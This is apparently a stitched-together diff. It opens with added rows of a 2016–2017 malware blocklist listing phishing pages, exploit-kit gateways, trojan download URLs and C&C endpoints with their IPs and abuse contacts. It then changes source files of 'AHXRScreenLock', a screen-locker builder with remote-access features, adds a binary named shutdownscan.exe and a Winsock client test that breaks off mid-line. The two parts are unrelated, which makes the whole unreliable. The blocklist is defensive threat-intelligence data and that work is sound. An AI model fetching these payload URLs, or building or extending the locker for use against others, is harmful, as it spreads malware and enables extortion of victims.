+"2016/03/13_14:23","-","185.11.146.198/","nginx1.vosuites.cl.","PayPal phishing","-","49349","0","NL", +"2016/03/15_07:55","www.schuh-zentgraf.de/","81.169.145.160","wa0.rzone.de.","iframe on compromised site leads to EK","hostmaster@strato.de","6724","0","DE", +"2016/03/15_11:48","legendsdtv.com/lmzjH7XQY/","67.212.178.106","m2304.sgded.com.","leads to CryptoLocker","Registrar Abuse Contact domainabuse@tucows.com","32475","0","US", +"2016/03/18_06:58","zt.tim-taxi.com/login.php","198.12.67.179","179.67.12.198.host.nwnx.net.","MasterCard phishing","Registrar Abuse Contact onlinenic-enduser@onlinenic.com","36352","0","US", +"2016/03/18_09:37","-","104.245.239.7/~earlysym/vr.php","infra23.imacomsolucoes.com.br.","WellsFargo phishing destination","-","62638","0","US", +"2016/03/18_14:13","marialorena.com.br/wp-content/plugins/hello123/8888ytc6r.exe","200.219.253.23","23.0-127.253.219.200.in-addr.arpa.","trojan","Andre Luiz Bili / bili@ionconsultoria.com.br","16397","0","BR", +"2016/03/29_20:56","holishit.in/wp-content/plugins/wpclef/assets/src/sass/neat/grid/binarystings.php","160.153.63.4","ip-160-153-63-4.ip.secureserver.net.","Teslacrypt c&c","Ankit Luthra / luthra.ankit@gmail.com","26496","0","US", +"2016/03/29_20:56","grosirkecantikan.com/wp-content/plugins/contact-form-7/includes/js/jquery-ui/themes/smoothness/images/binarystings.php","192.185.51.87","-","Teslacrypt c&c","Registrant 7C066F9203AB46FC9331AF2FCDB5DD5E.PROTECT@WHOISGUARD.COM","20013","0","US", +"2016/03/31_10:01","kassabravo.com/","67.196.85.119","israsky.com.","iframe on compromised site leads to EK","Registrant ELI72@013.NET","8001","0","US", +"2016/03/31_13:34","www.actiagroup.com/","141.0.187.5","-","iframe on compromised site leads to EK","Registrar Abuse Contact abuse@support.gandi.net","30741","0","FR", +"2016/06/28_20:52","www.alphamedical02.fr/","94.23.236.74","ns308230.ip-94-23-236.eu.","iframe on compromised site leads to EK","stephane.louis@impaakt.fr","16276","0","FR", +"2016/04/28_07:49","www.dezuiderwaard.nl/","195.238.74.87","www53.totaalholding.nl.","iframe on compromised site leads to EK","-","50673","0","NL", +"2016/04/28_12:00","kollagen4you.se/","46.252.206.1","n1nlhg198c1198.shr.prod.ams1.secureserver.net.","iframe on compromised site leads to EK","-","26496","0","NL", +"2016/04/28_14:52","www.del-marine.com/","80.244.187.39","mail.ebnserver1.com.","iframe on compromised site leads to EK","Registrar Abuse Contact domainabuse@tucows.com","34934","0","GB", +"2016/05/02_10:23","www.donneuropa.it/","23.23.85.3","ec2-23-23-85-3.compute-1.amazonaws.com.","iframe on compromised site leads to EK","-","14618","0","US", +"2016/05/05_18:09","www.roltek.com.tr/","94.73.151.5","94-73-151-5.cizgi.net.tr.","iframe on compromised site leads to EK","-","34619","0","TR", +"2016/05/10_07:18","www.outlinearray.com/","85.235.130.71","w461.widhost.net.","iframe on compromised site leads to EK","Registrar Abuse Contact domainabuse@tucows.com","31034","0","IT", +"2016/05/12_08:36","www.airsonett.se","193.44.13.93","193-44-13-93.net.tnm.se.","iframe on compromised site leads to EK","-","3301","0","SE", +"2016/05/12_14:22","www.autoappassionati.it/","109.233.126.14","cpanel01.infinitynet.it.","iframe on compromised site leads EK","-","48815","0","IT", +"2016/05/23_09:06","www.sieltre.it/","79.58.246.237","host237-246-static.58-79-b.business.telecomitalia.it.","iframe on compromised site leads to EK","-","3269","0","IT", +"2016/05/24_17:36","www.ceisystems.it/","178.212.142.108","ceisystems.it.","iframe on compromised site leads to EK","-","47316","0","IT", +"2016/05/30_11:34","www.northpoleitalia.it/","46.37.11.7","host7-11-37-46.serverdedicati.aruba.it.","iframe on compromised site leads to EK","-","","0","", +"2016/05/30_16:31","buildviet.info/servicer/fattura/","123.30.240.66","static.vdc.vn.","redirects to trojan download at SugarSync","VDC Online / domain@vdc.com.vn","45899","0","VN", +"2016/06/06_10:17","welington.info/","187.17.111.101","-","iframe on compromised site leads to EK","Welington dos Santos Silva / welington.silva@hotmail.com.br","7162","0","BR", +"2016/06/07_08:37","www.vertourmer.com/","81.31.147.91","jmhlmd41.colt-engine.it.","iframe on compromised site leads to EK","Registrar Abuse Contact domainabuse@tucows.com","47242","0","IT", +"2016/06/16_12:43","jeanlesigne.com/wp-content/file.exe","46.4.100.162","server18.hosting010.nl.","Trojan.Backdoor","Registrant 760130F961CC42B39A919079849FA4A5.PROTECT@WHOISGUARD.COM","24940","0","DE", +"2016/06/17_12:10","www.nuvon.com/","64.207.96.72","-","iframe on compromised site leads to EK","-","11598","0","US", +"2016/06/17_12:10","ex.technor.com/index.php","82.113.193.43","web.alias.twt.it.","iframe on compromised site leads to EK","Registrar Abuse Contact abuse-registrar@orange-business.com","30848","0","IT", +"2016/07/08_16:15","cosmos.felago.es/gsvot2.html","93.190.140.110","customer.worldstream.nl.","gateway to EK","-","49981","0","NL", +"2016/06/20_14:33","www.salentoeasy.it/","95.110.189.62","host62-189-110-95.serverdedicati.aruba.it.","iframe on compromised site leads to EK","-","31034","0","IT", +"2016/06/21_10:21","www.fsm-europe.eu/","79.96.162.106","cloudserver092054.home.net.pl.","iframe on compromised site leads to EK","NOT DISCLOSED! / -","12824","0","PL", +"2016/06/24_12:43","www.fiocchidiriso.com/","81.31.147.98","jmhlmd43.colt-engine.it.","iframe on compromised site leads to EK","Registrar Abuse Contact domainabuse@tucows.com","47242","0","IT", +"2016/06/23_15:01","www.enchantier.com/","176.31.73.196","www.enchantier.com.","iframe on compromised site leads to EK","Registrar Abuse Contact abuse@1and1.com","16276","0","FR", +"2016/06/27_08:07","www.gennaroespositomilano.it/","75.126.217.36","web234.webfaction.com.","iframe on compromised site leads to EK","-","36351","0","US", +"2016/06/27_12:33","www.airbornehydrography.com/","194.9.95.65","s210.loopia.se.","iframe on compromised site leads to EK","Registrar Abuse Contact abuse@ascio.com","39570","0","SE", +"2016/06/29_08:48","websitebuildersinfo.in","166.62.28.83","ip-166-62-28-83.ip.secureserver.net.","fake infection page","robert hawkins / robertkins1@outlook.com","26496","0","US", +"2016/07/07_10:05","scream.garudamp3.com/arais2.html","93.190.140.110","customer.worldstream.nl.","gateway to EK","Registrant PAOLO@KIMCIL.WS","49981","0","NL", +"2016/07/07_12:15","exclaim.goldenteamacademy.cl/arais2.html","93.190.140.110","customer.worldstream.nl.","gateway to EK","-","49981","0","NL", +"2016/07/07_13:30","shoal.grahanusareadymix.com/arais2.html","93.190.140.110","customer.worldstream.nl.","gateway to EK","Registrar Abuse Contact domainabuse@tucows.com","49981","0","NL", +"2016/07/08_11:20","concede.fmtlib.net/khoklj2.html","93.190.140.110","customer.worldstream.nl.","gateway to EK","moniker.com billing department / tech@moniker.com","49981","0","NL", +"2016/07/08_14:05","boots.fotopyra.pl/gsvot2.html","93.190.140.110","customer.worldstream.nl.","gateway to EK","kontakt@nazwa.pl","49981","0","NL", +"2016/07/08_15:45","drank.fa779.com/gsvot2.html","93.190.140.110","customer.worldstream.nl.","gateway to EK","Registrant tmm121212@163.com","49981","0","NL", +"2016/07/08_16:50","milf.gabriola.cl/gsvot2.html","93.190.140.110","customer.worldstream.nl.","gateway to EK","-","49981","0","NL", +"2016/07/08_16:55","cosmos.furnipict.com/gsvot2.html","93.190.140.110","customer.worldstream.nl.","gateway to EK","Registrar Abuse Contact domainabuse@tucows.com","49981","0","NL", +"2016/07/12_13:19","www.ywvcomputerprocess.info/errorreport/ty5ug6h4ndma4/","103.224.212.222","lb-212-222.above.com.","fake alert page","ywvcomputerprocess.info@domainsbyproxy.com","133618","0","AU", +"2016/10/13_14:03","www.family-partners.fr/data.dpg","95.142.169.132","xvm-169-132.ghst.net.","ransomware","noc@gandi.net","29169","0","FR", +"2016/07/13_11:10","trifle.ernstenco.be/ajuijm2.html","93.190.140.110","customer.worldstream.nl.","gateway to EK","Not shown, please visit www.dnsbelgium.be for webbased whois. / administrator@mijnhostingpartner.nl","49981","0","NL", +"2016/07/13_12:10","vomit.facilitandosonhos.com.br/ajuijm2.html","93.190.140.110","customer.worldstream.nl.","gateway to EK","Mariana Helena Queiroz Santos / marianahqs@gmail.com","49981","0","NL", +"2016/07/13_12:15","stork.escortfinder.cl/ajuijm2.html","93.190.140.110","customer.worldstream.nl.","gateway to EK","-","49981","0","NL", +"2016/07/13_12:45","erupt.fernetmoretti.com.ar/ajuijm2.html","93.190.140.110","customer.worldstream.nl.","gateway to EK","-","49981","0","NL", +"2016/07/13_12:50","invention.festinolente.cl/ajuijm2.html","93.190.140.110","customer.worldstream.nl.","gateway to EK","-","49981","0","NL", +"2016/07/13_16:30","crops.dunight.eu/uzjuz2.html","93.190.140.110","customer.worldstream.nl.","gateway to EK","NOT DISCLOSED! / -","49981","0","NL", +"2016/07/13_17:05","higher.dwebsi.tk/uzjuz2.html","93.190.140.110","customer.worldstream.nl.","gateway to EK","E-mail: abuse: abuse@freenom.com, copyright infringement: copyright@freenom.com","49981","0","NL", +"2016/07/13_18:15","headless.ebkfwd.com/uzjuz2.html","93.190.140.110","customer.worldstream.nl.","gateway to EK","Registrar Abuse Contact domainabuse@tucows.com","49981","0","NL", +"2016/07/13_18:20","above.e-rezerwacje24.pl/uzjuz2.html","93.190.140.110","customer.worldstream.nl.","gateway to EK","bok@domena.pl","49981","0","NL", +"2016/07/14_13:10","personal.editura-amsibiu.ro/rdxzmt2.html","93.190.140.110","customer.worldstream.nl.","gateway to EK","-","49981","0","NL", +"2016/07/14_14:15","likes.gisnetwork.net/ysfmgl2.html","93.190.140.110","customer.worldstream.nl.","gateway to EK","Registrar Abuse Contact domainabuse@tucows.com","49981","0","NL", +"2016/07/14_14:20","terem.eltransbt.ro/ysfmgl2.html","93.190.140.110","customer.worldstream.nl.","gateway to EK","-","49981","0","NL", +"2016/07/14_15:30","pacman.gkgar.com/omrjy2.html","93.190.140.110","customer.worldstream.nl.","gateway to EK","Registrant tekinabay4@hotmail.com","49981","0","NL", +"2016/07/14_15:35","pacan.gofreedom.info/omrjy2.html","93.190.140.110","customer.worldstream.nl.","gateway to EK","Go Freedom Info / gofreedom@protonmail.ch","49981","0","NL", +"2016/07/14_17:25","absurdity.flarelight.com/xdnkn2.html","93.190.140.110","customer.worldstream.nl.","gateway to EK","Registrar Abuse Contact domains@crazydomains.com","49981","0","NL", +"2016/07/18_13:10","aircraft.evote.cl/ybluq2.html","93.190.140.110","customer.worldstream.nl.","gateway to EK","-","49981","0","NL", +"2016/07/18_15:30","produla.czatgg.pl/rxdjna2.html","93.190.140.118","customer.worldstream.nl.","gateway to EK","bok@biznes-host.pl","49981","0","NL", +"2016/07/18_16:40","vdula.czystykod.pl/rxdjna2.html","93.190.140.118","customer.worldstream.nl.","gateway to EK","domeny@ConsultingService.pl","49981","0","NL", +"2016/07/18_17:15","stock.daydreamfuze.com/rxdjna2.html","93.190.140.118","customer.worldstream.nl.","gateway to EK","-","49981","0","NL", +"2016/07/18_17:31","www.luce.polimi.it/it/","131.175.187.208","web193.asict.polimi.it.","iframe on compromised site leads to EK","-","137","0","IT", +"2016/07/18_18:30","soros.departamentosejecutivos.cl/venak2.html","93.190.140.118","customer.worldstream.nl.","gateway to EK","-","49981","0","NL", +"2016/07/20_14:05","smilll.depozit.hr/bgaldb2.html","93.190.140.121","customer.worldstream.nl.","gateway to EK","-","49981","0","NL", +"2016/07/20_15:15","spread.diadanoivabh.com.br/alvbh2.html","93.190.140.121","customer.worldstream.nl.","gateway to EK","Bernardo Barreto Cyrillo / bernardobcy@gmail.com","49981","0","NL", +"2016/07/20_16:25","pave.elisecries.com/zbtqvc2.html","93.190.140.121","customer.worldstream.nl.","gateway to EK","-","49981","0","NL", +"2016/07/20_16:30","plank.duplicolor.cl/zbtqvc2.html","93.190.140.121","customer.worldstream.nl.","gateway to EK","-","49981","0","NL", +"2016/07/20_17:35","lay.elticket.com.ar/tslwo2.html","93.190.140.121","customer.worldstream.nl.","gateway to EK","-","49981","0","NL", +"2016/07/21_12:15","borat.elticket.com.ar/pkge2.html","93.190.140.121","customer.worldstream.nl.","gateway to EK","-","49981","0","NL", +"2016/07/21_13:20","adv.riza.it/www/delivery/ajs.php?zoneid=51&cb=96020978060","62.149.195.107","host107-195-149-62.serverdedicati.aruba.it.","iframe on compromised site leads to exploit kit","-","31034","0","IT", +"2016/07/21_14:40","peeg.fronterarq.cl/odbsx2.html","93.190.140.121","customer.worldstream.nl.","gateway to EK","-","49981","0","NL", +"2016/07/21_14:45","hmora.fred-build.tk/odbsx2.html","93.190.140.121","customer.worldstream.nl.","gateway to EK","E-mail: abuse: abuse@freenom.com, copyright infringement: copyright@freenom.com","49981","0","NL", +"2016/07/21_15:20","molla.gato1000.cl/edmiu2.html","93.190.140.121","customer.worldstream.nl.","gateway to EK","-","49981","0","NL", +"2016/07/21_16:30","victor.connectcloud.ch/nukgfr2.html","93.190.140.121","customer.worldstream.nl.","gateway to EK","-","49981","0","NL", +"2016/07/21_16:35","lexu.goggendorf.at/nukgfr2.html","93.190.140.121","customer.worldstream.nl.","gateway to EK","-","49981","0","NL", +"2016/08/09_12:36","avokka.com/Panel/dl.exe","67.212.91.221","beach.sibername.com.","Trojan.Backdoor","Registrant contact@privacyprotect.org","10929","0","CA", +"2016/08/09_12:36","avokka.com/Panel/gate.php","67.212.91.221","beach.sibername.com.","Trojan.C&C","Registrant contact@privacyprotect.org","10929","0","CA", +"2016/08/09_20:02","www.jcmarcadolib.com/hbc/a.php","82.221.129.16","esja.orangewebsite.com.","phishing","Registrar Abuse Contact abuse@internet.bs","50613","0","IS", +"2016/08/12_07:01","euro-vertrieb.com/hosteurope/KIS-Login.htm","217.31.81.101","zaphod3-1.hostweb.de.","Hosteurope phishing","Registrar Abuse Contact abuse@corehub.net","29140","0","DE", +"2016/08/13_10:47","coffeol.com/fend/raw_server.exe","208.112.30.120","-","Trojan.Backdoor","-","20021","0","US", +"2016/08/13_10:47","www.pgathailand.com/which.exe","128.199.127.7","pyptech.net.","Trojan.P0ny","-","133165","0","GB", +"2016/08/22_16:35","scanty.colormark.cl/rjavgx3.html","93.190.140.163","customer.worldstream.nl.","gateway to EK","-","49981","0","NL", +"2016/08/22_18:45","decorator.crabgrab.cl/rjavgx3.html","93.190.140.163","customer.worldstream.nl.","gateway to EK","-","49981","0","NL", +"2016/08/23_17:30","pumpkin.brisik.net/rvgkm3.html","93.190.140.162","customer.worldstream.nl.","gateway to EK","Registrar Abuse Contact abuse@melbourneit.com.au","49981","0","NL", +"2016/08/23_18:40","losos.caliane.com.br/wkicrz3.html","93.190.140.162","customer.worldstream.nl.","gateway to EK","Newton Arigony da Silva Neto / newtondf@gmail.com","49981","0","NL", +"2016/08/23_18:45","losas.cabanaslanina.com.ar/wkicrz3.html","93.190.140.162","customer.worldstream.nl.","gateway to EK","-","49981","0","NL", +"2016/08/26_10:10","wopper.bioblitzgaming.ca/pwigd3.html","93.190.140.162","customer.worldstream.nl.","gateway to EK","-","49981","0","NL", +"2016/08/26_10:45","mepra.blautechnology.cl/pwigd3.html","93.190.140.162","customer.worldstream.nl.","gateway to EK","-","49981","0","NL", +"2016/08/26_11:55","wixx.caliptopis.cl/lwwxx3.html","93.190.140.162","customer.worldstream.nl.","gateway to EK","-","49981","0","NL", +"2016/08/26_12:00","funkucck.bluerobot.cl/lwwxx3.html","93.190.140.162","customer.worldstream.nl.","gateway to EK","-","49981","0","NL", +"2016/08/26_12:35","soxorok.ddospower.ro/lwwxx3.html","93.190.140.162","customer.worldstream.nl.","gateway to EK","-","49981","0","NL", +"2016/08/26_15:05","pybul.bestfrozenporn.nl/jvoxyj3.html","93.190.140.162","customer.worldstream.nl.","gateway to EK","-","49981","0","NL", +"2016/08/26_15:40","bonjo.bmbsklep.pl/jvoxyj3.html","93.190.140.162","customer.worldstream.nl.","gateway to EK","domeny@ConsultingService.pl","49981","0","NL", +"2016/08/26_16:55","womsy.bobbutcher.net/rtuee3.html","93.190.140.162","customer.worldstream.nl.","gateway to EK","-","49981","0","NL", +"2016/08/26_17:35","gojnox.boxtomarket.com/yxmvr3.html","93.190.140.162","customer.worldstream.nl.","gateway to EK","Registrant VENTAS@CAMINOWEB.COM","49981","0","NL", +"2016/08/29_12:35","honor.agitaattori.fi/rncbu3.html","93.190.140.162","customer.worldstream.nl.","gateway to EK","-","49981","0","NL", +"2016/08/29_13:10","geil.alon3.tk/rncbu3.html","93.190.140.162","customer.worldstream.nl.","gateway to EK","E-mail: abuse: abuse@freenom.com, copyright infringement: copyright@freenom.com","49981","0","NL", +"2016/08/29_13:15","vitaly.agricolacolhue.cl/rncbu3.html","93.190.140.162","customer.worldstream.nl.","gateway to EK","-","49981","0","NL", +"2016/08/29_14:25","unlink.altitude.lv/vdgqb3.html","93.190.140.162","customer.worldstream.nl.","gateway to EK","siaaltitude@gmail.com","49981","0","NL", +"2016/08/29_15:40","cqji.artidentalkurs.com/vdgqb3.html","93.190.140.162","customer.worldstream.nl.","gateway to EK","-","49981","0","NL", +"2016/08/30_12:20","rufex.ajfingenieros.cl/dsgajo3.html","93.190.140.162","customer.worldstream.nl.","gateway to EK","-","49981","0","NL", +"2016/08/30_12:25","wuvac.agwebdigital.com/dsgajo3.html","93.190.140.162","customer.worldstream.nl.","gateway to EK","Registrant WK356W35HL64VDK@PROXY.DREAMHOST.COM","49981","0","NL", +"2016/09/01_11:55","tanner.alicerosenmanmemorial.com/hggfgl3.html","93.190.140.162","customer.worldstream.nl.","gateway to EK","-","49981","0","NL", +"2016/09/01_14:55","sanya.vipc2f.com/ceqxwu3.html","93.190.140.162","customer.worldstream.nl.","gateway to EK","Registrar Abuse Contact abuse@namesilo.com","49981","0","NL", +"2016/09/01_16:55","livre.wasastation.fi/ceqxwu3.html","93.190.140.162","customer.worldstream.nl.","gateway to EK","-","49981","0","NL", +"2016/09/01_17:00","pogruz.wanyizhao.net/ceqxwu3.html","93.190.140.162","customer.worldstream.nl.","gateway to EK","Registrant wangsongd@gmail.com","49981","0","NL", +"2016/09/01_17:35","tahit.wastech2016.in/xcqrsw3.html","93.190.140.162","customer.worldstream.nl.","gateway to EK","Chirag Bhimani / chirag@bhimani.in","49981","0","NL", +"2016/09/05_09:37","ad.9tv.co.il/serv4/www/delivery/ajs.php?zoneid=37&cb=54350405237&charset=utf-8","62.219.67.44","bzq-67-44.red.bezeqint.net.","iframe on compromised site leads to exploit kit","-","8551","0","IL", +"2016/09/05_09:37","giants.yourzip.co/static/quotes.js?ver=d58072be2820e8682c0a27c0518e805e","5.200.55.58","-","leads to exploit kit","David Atherton / automotiveace@gmail.com","48096","0","RU", +"2016/09/05_09:37","evans.babajilab.in/specimen/1479491/tire-something-detect-five-what-knot-unknown-entertain-stiff","85.143.219.181","60567.simplecloud.club.","exploit kit","Zimong Software Private Limited Zimong Software Private Limited / info@zimong.com","201848","0","RU", +"2016/09/05_10:07","ross.starvingmillionaire.org/unveiled/dropdown.js?ver=496e05e1aea0a9c4655800e8a7b9ea28","5.200.55.58","-","leads to exploit kit","Keith Weaver / keith@keithlweaver.com","48096","0","RU", +"2016/09/06_11:49","structured.blackswanstore.com/plc/header.js","5.200.55.91","-","leads to exploit kit","-","48096","0","RU", +"2016/09/06_12:42","jessisjewels.com/disk/update/postmaster/en/?ar=yourname@yourdomain.com","50.87.153.96","50-87-153-96.unifiedlayer.com.","phishing site","-","46606","0","US", +"2016/09/15_08:48","tscl.com.bd/m/RI%20XIN%20QUOTATION%20LIST.zip","209.99.16.206","206.0/24.16.99.209.in-addr.arpa.","trojan inside zip file","-","394695","0","US", +"2016/09/15_10:06","catjogger.win/ganel/gate.php","213.145.225.170","web02.chillydomains.com.","pony loader c&c","-","25575","0","AT", +"2016/09/21_12:12","apexgames.org/ykxj6/par/factura.zip","166.62.112.150","ip-166-62-112-150.ip.secureserver.net.","Javascript inside zip file leads to trojan","APEXGAMES.ORG@domainsbyproxy.com","26496","0","US", +"2016/09/21_12:12","art-archiv.ru/images/animated-number/docum-arhiv.exe","81.177.139.111","-","trojan","-","8342","0","RU", +"2016/10/13_14:03","elmissouri.fr/data.dpg","213.186.33.50","cluster017.ovh.net.","ransomware","tech@ovh.net","16276","0","FR", +"2016/10/30_01:52","kingskillz.ru/~kingskil/Prince/Man/lucy/mine/shit.exe","85.143.215.183","62695.simplecloud.club.","Trojan.FareIt","-","201848","0","RU", +"2017/01/19_13:05","61kx.uk-insolvencydirect.com/sending_data/in_cgi/bbwp/cases/Inquiry.php","35.166.113.223","ec2-35-166-113-223.us-west-2.compute.amazonaws.com.","leads to ransomware","Registrar Abuse Contact abuse@namesilo.com","16509","0","US", +"2017/01/19_13:05","daralasnan.com/wp-content/plugins/mkazaqbya/vmywyvz4.php","166.62.12.1","sg2nlhg800c1800.shr.prod.sin2.secureserver.net.","leads to ransomware","-","26496","0","US", +"2017/01/19_13:05","www.studiolegaleabbruzzese.com/wp-content/plugins/urxwhbnw3ez/flight_4832.pdf","62.149.142.206","webx440.aruba.it.","ransomware","Registrar Abuse Contact domainabuse@tucows.com","31034","0","IT", +"2017/01/19_13:05","raneevahijab.id/adnin/box/workspace/","103.24.13.91","server3.e-cbncloud.co.id.","phishing site","-","132644","0","ID", +"2017/01/25_20:15","www.lifelabs.vn/api/get.php?id=aW5mb0BzYXBjdXBncmFkZXMuY29t","118.69.196.199","-","Trojan.Backdoor, Office.Word.Downloader","-","18403","0","VN", +"2017/01/25_20:16","falconsafe.com.sg/api/get.php?id=aW5mb0BzYXBjdXBncmFkZXMuY29t","43.229.84.107","-","Trojan.Backdoor, Office.Word.Downloader","domain@exabytes.sg","38532","0","SG", +"2017/02/09_14:04","fo5.a1-downloader.org/g2v9s1.php?id=yourname@yourdomain.com","188.225.32.177","vds-tibca.timeweb.ru.","trojan download","Protection of Private Person / a1-downloader.org@regprivate.ru","9123","0","RU", +"2017/03/06_21:09","www.hjaoopoa.top/admin.php?f=1.gif","52.207.234.89","ec2-52-207-234-89.compute-1.amazonaws.com.","Cerber ransomware","Registrant lecborbobl@rothtec.com","14618","0","US", +"2017/03/06_21:09","up.mykings.pw:8888/update.txt","60.250.76.52","60-250-76-52.HINET-IP.hinet.net.","related to a Mirai windows spreader trojan","Registrant 30da1310f05f42d7a349460c551aee6f.protect@whoisguard.com","3462","0","TW", +"2017/03/06_21:09","down.mykings.pw:8888/ver.txt","60.250.76.52","60-250-76-52.HINET-IP.hinet.net.","related to a Mirai windows spreader trojan","Registrant 30da1310f05f42d7a349460c551aee6f.protect@whoisguard.com","3462","0","TW", +"2017/03/06_21:09","down.mykings.pw:8888/ups.rar","60.250.76.52","60-250-76-52.HINET-IP.hinet.net.","related to a Mirai windows spreader trojan","Registrant 30da1310f05f42d7a349460c551aee6f.protect@whoisguard.com","3462","0","TW", +"2017/03/14_23:02","ssl-6582datamanager.de/","54.72.9.51","ec2-54-72-9-51.eu-west-1.compute.amazonaws.com.","redirects to Paypal phishing","goldanderwand@aol.com","16509","0","US", +"2017/03/14_23:02","privatkunden.datapipe9271.com/","104.31.75.147","-","Paypal phishing","Registrar Abuse Contact abuse@namecheap.com","13335","0","US", +"2017/03/20_10:13","alegroup.info/ntnrrhst","194.87.217.87","mccfortwayne.org.","Ransom, Fake.PCN, Malspam","Lee Everton / lee_everton2002@yahoo.com","197695","0","RU", +"2017/03/20_10:13","fourthgate.org/Yryzvt","104.200.67.194","-","Ransom, Fake.PCN, Malspam","Charlie Dillon / godaddy@638united.com","8100","0","US", +"2017/03/20_10:13","dieutribenhkhop.com/parking/","84.200.4.125","125.0-255.4.200.84.in-addr.arpa.","Ransom, Fake.PCN, Malspam","-","31400","0","DE", +"2017/03/20_10:13","dieutribenhkhop.com/parking/pay/rd.php?id=10","84.200.4.125","125.0-255.4.200.84.in-addr.arpa.","Ransom, Fake.PCN, Malspam","-","31400","0","DE", +"2017/05/01_16:22","amazon-sicherheit.kunden-ueberpruefung.xyz","185.61.138.74","hosted-by.blazingfast.io.","phishing","-","49349","0","UA", +"2017/06/02_08:38","sarahdaniella.com/swift/SWIFT%20$.pdf.ace","63.247.140.224","coriandertest.hmdnsgroup.com.","trojan","Registrar Abuse Contact abuse@gkg.net","19271","0","US", +"2017/09/28_08:11","izeselet.hu/wp-content/uploads/2016/03/ch.js","87.229.63.171","s3.abplusz.hu.","coin mining","-","62292","0","HU", +"2017/10/26_13:48","photoscape.ch/Setup.exe","31.148.219.11","knigazdorovya.com.","trojan","-","14576","0","CZ", + diff --git a/_build/shutdownscan.exe b/_build/shutdownscan.exe new file mode 100644 index 0000000..5caddcb Binary files /dev/null and b/_build/shutdownscan.exe differ diff --git a/src/builder/build.h b/src/builder/build.h index 5b67d5f..834220e 100644 --- a/src/builder/build.h +++ b/src/builder/build.h @@ -23,8 +23,9 @@ extern void validateClientBuild(System::String ^ message, System::String ^ password, System::Windows::Forms::SaveFileDialog ^ saveref, bool showDialog=true); extern void createClientLocker(System::String ^ fileName, System::String ^ password, System::String ^ message, System::String ^ exe, System::String ^ address, bool exith=true); -#define ERROR_MSG_1 "Illegal Characters" -#define ERROR_MSG_2 "Please enter a message." -#define ERROR_MSG_3 "Please enter a password." -#define WARNING_MSG "Warning: Unauthorized remote access to another computer is considered illegal in most cases. By toggling this on, you agree and take full responsbility for your actions." -#define COMPLETE_MSG "Done." \ No newline at end of file +#define ERROR_MSG_1 "Illegal Characters" +#define ERROR_MSG_2 "Please enter a message." +#define ERROR_MSG_3 "Please enter a password." +#define WARNING_MSG "Warning: Unauthorized remote access to another computer is considered illegal in most cases. By toggling this on, you agree and take full responsbility for your actions." +#define COMPLETE_MSG "Done." +#define LOCKER_FILE_PATH "AHXRLocker.exe" \ No newline at end of file diff --git a/src/builder/frmMain.h b/src/builder/frmMain.h index 548f2b7..25f57ce 100644 --- a/src/builder/frmMain.h +++ b/src/builder/frmMain.h @@ -452,6 +452,7 @@ namespace AHXRScreenLock { packLocker(s_file, marshal_as< std::string >(this->txtPassword->Text), marshal_as< std::string >(this->txtMessage->Text)); this->pgBar->Value = 80; if ( !s_attached_p.empty() ) { + puts(s_attached_p.c_str()); attachExecutable(s_file, s_attached_p); } diff --git a/src/builder/main.cpp b/src/builder/main.cpp index 5ec88cc..407c42f 100644 --- a/src/builder/main.cpp +++ b/src/builder/main.cpp @@ -48,6 +48,8 @@ void main(array^ args) { #ifdef DEBUG_MODE packLocker("AXHRLocker.exe", "hi", "basic message."); #endif + setLockerFileName(LOCKER_FILE_PATH); + if (args->Length >= 3) createClientLocker(args[ARG_FILE_NAME], args[ARG_PASSWORD], args[ARG_MESSAGE], args[ARG_EXE], args[ARG_ADDRESS]); diff --git a/src/library/locker.cpp b/src/library/locker.cpp index 0385389..1a9bd24 100644 --- a/src/library/locker.cpp +++ b/src/library/locker.cpp @@ -36,6 +36,8 @@ void buildNewLocker(string fileName) { ofstream f_new; + puts(LOCKER_FILE_NAME.c_str()); + f_old.open(LOCKER_FILE_NAME, ios::binary); f_new.open(fileName, ios::binary); diff --git a/src/library/settings.h b/src/library/settings.h index 836ce7f..c833fa4 100644 --- a/src/library/settings.h +++ b/src/library/settings.h @@ -20,14 +20,6 @@ along with AHXRScreenLock. If not, see . */ //======================================================= -//#define DEBUG_MODE - -#define ARG_FILE_NAME 0 -#define ARG_PASSWORD 1 -#define ARG_MESSAGE 2 -#define ARG_EXE 3 -#define ARG_ADDRESS 4 - #define PACK_SPLITTER "----" #define PACK_OPENER "{" #define PACK_CLOSER "}" diff --git a/src/listener/clientTest.cpp b/src/listener/clientTest.cpp new file mode 100644 index 0000000..6b7f1e7 --- /dev/null +++ b/src/listener/clientTest.cpp @@ -0,0 +1,159 @@ +/* + @title + AHXRScreenLock + @author + AHXR (https://github.com/AHXR) + @copyright + 2017 + + AHXRScreenLock is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + AHXRScreenLock is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with AHXRScreenLock. If not, see . +*/ +//======================================================= +#define WIN32_LEAN_AND_MEAN + +#include +#include +#include +#include +#include +#include "clientTest.h" +#include "serverThread.h" + +#pragma comment (lib, "Ws2_32.lib") +#pragma comment (lib, "Mswsock.lib") +#pragma comment (lib, "AdvApi32.lib") + +HANDLE h_client; +DWORD dw_client; +bool b_new_message = false; +char * c_message; + + + +void sendNewMessage(char * message) { + b_new_message = true; + c_message = message; +} + +#ifdef CLIENT_SERVER_TEST + +void clientServerTest() { + h_client = CreateThread(0, 0, t_clientServerTest, 0, 0, &dw_client); +} + +DWORD WINAPI t_clientServerTest(LPVOID lpParameter) { + WSADATA wsaData; + SOCKET ConnectSocket = INVALID_SOCKET; + struct addrinfo *result = NULL, + *ptr = NULL, + hints; + char recvbuf[DEFAULT_BUFLEN]; + int iResult; + int recvbuflen = DEFAULT_BUFLEN; + + // Initialize Winsock + iResult = WSAStartup(MAKEWORD(2, 2), &wsaData); + if (iResult != 0) { + printf("WSAStartup failed with error: %d\n", iResult); + return 1; + } + + ZeroMemory(&hints, sizeof(hints)); + hints.ai_family = AF_UNSPEC; + hints.ai_socktype = SOCK_STREAM; + hints.ai_protocol = IPPROTO_TCP; + + // Resolve the server address and port + iResult = getaddrinfo("localhost", DEFAULT_PORT, &hints, &result); + if (iResult != 0) { + printf("getaddrinfo failed with error: %d\n", iResult); + WSACleanup(); + return 1; + } + + // Attempt to connect to an address until one succeeds + for (ptr = result; ptr != NULL; ptr = ptr->ai_next) { + + // Create a SOCKET for connecting to server + ConnectSocket = socket(ptr->ai_family, ptr->ai_socktype, + ptr->ai_protocol); + if (ConnectSocket == 